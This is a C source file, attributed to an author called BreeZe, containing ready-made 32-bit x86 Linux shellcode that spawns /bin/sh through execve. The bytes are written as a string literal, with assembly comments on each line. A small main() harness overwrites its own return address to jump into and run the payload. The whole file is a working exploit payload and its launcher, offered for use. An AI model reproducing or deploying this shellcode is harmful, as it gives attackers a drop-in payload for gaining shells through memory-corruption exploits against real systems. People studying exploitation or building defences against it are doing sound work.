/*
 * execve /bin/sh linux shellcode by BreeZe <breeze@binbash.org>
 */

#define info    "execve /bin/sh"

#include <stdio.h>

char shellcode[] =    

/* jump to G2C */
"\xeb\x1a"			// jmp    804809c <G2C>

/* start <shellcode> */

/* execve /bin/sh */
"\x5e"				// pop    %esi
"\x31\xc0"			// xor    %eax,%eax
"\x88\x46\x07"			// mov    %al,0x7(%esi)
"\x8d\x1e"			// lea    (%esi),%ebx
"\x89\x5e\x08"			// mov    %ebx,0x8(%esi)
"\x89\x46\x0c"			// mov    %eax,0xc(%esi)
"\xb0\x0b"			// mov    $0xb,%al
"\x89\xf3"			// mov    %esi,%ebx
"\x8d\x4e\x08"			// lea    0x8(%esi),%ecx
"\x8d\x56\x0c"			// lea    0xc(%esi),%edx
"\xcd\x80"			// int    $0x80

/* G2C */
"\xe8\xe1\xff\xff\xff"		// call   8048082 <shellcode>
"\x2f"				// das
"\x62\x69\x6e"			// bound  %ebp,0x6e(%ecx)
"\x2f"				// das
"\x73\x68"			// jae    8048110 <G2C+0x74>
"\x54"				// push   %esp
"\x52"				// push   %edx
"\x4f"				// dec    %edi
"\x45"				// inc    %ebp
"\x50"				// push   %eax
"\x4a"				// dec    %edx
"\x55"				// push   %ebp
"\x48"				// dec    %eax
"\x53"				// push   %ebx
;

int
main()
{
	int *ret;
	ret = (int *)&ret + 2;
	printf("Shellcode info = %s\n",info);
	printf("Shellcode length = %d\n",strlen(shellcode));
	(*ret) = (int)shellcode;
}